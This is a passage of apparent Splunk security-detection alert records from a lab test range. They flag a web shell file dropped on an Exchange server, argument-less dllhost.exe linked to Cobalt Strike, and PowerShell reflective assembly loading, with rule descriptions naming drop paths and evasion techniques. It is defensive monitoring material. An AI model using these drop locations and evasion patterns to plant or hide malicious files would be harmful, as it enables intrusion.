\"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="3800", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664798400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664798400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xed8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802558, search_name="ESCU - Detect Exchange Web Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\", \"T1190\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"file_name\", \"role\": [\"Victim\"], \"type\": \"File Name\"}]}", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", annotations.mitre_attack="T1190", dest="exchange01.attackrange.local", file_create_time="2022-10-03 12:10:31.825", file_name="obuxi.aspx", file_path="C:\\inetpub\\wwwroot\\aspnet_client\\obuxi.aspx", info_max_time="+Infinity", info_min_time="0.000", process_name="System", risk_message="A file - obuxi.aspx was written to disk that is related to IIS exploitation previously performed by HAFNIUM. Review further file modifications on endpoint exchange01.attackrange.local by user $user$.", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="81.0", savedsearch_description="The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell. Paths include: `\\HttpProxy\\owa\\auth\\`, `\\inetpub\\wwwroot\\aspnet_client\\`, and `\\HttpProxy\\OAB\\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant.", threat_object="obuxi.aspx", threat_object_type="file name" 1664794800, search_name="ESCU - DLLHost with no Command Line Arguments with Network - Rule", C2="0:0:0:0:0:0:0:1", orig_time="1664794800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_image\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", dest="win-dc-mhaag-attack-range-622.attackrange.local", dest_port="890", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4996", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="The process dllhost.exe was spawned by $parent_image$ without any command-line arguments on win-dc-mhaag-attack-range-622.attackrange.local by $user$.", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments with a network connection. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="dllhost.exe", threat_object_type="process" 1664801732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T11:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T11:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664801732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T11:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T11:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664801732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T11:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T11:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664801732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T11:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T11:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664794800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664794800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4996", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664794800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664794800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1384", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664798132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T10:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T10:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", 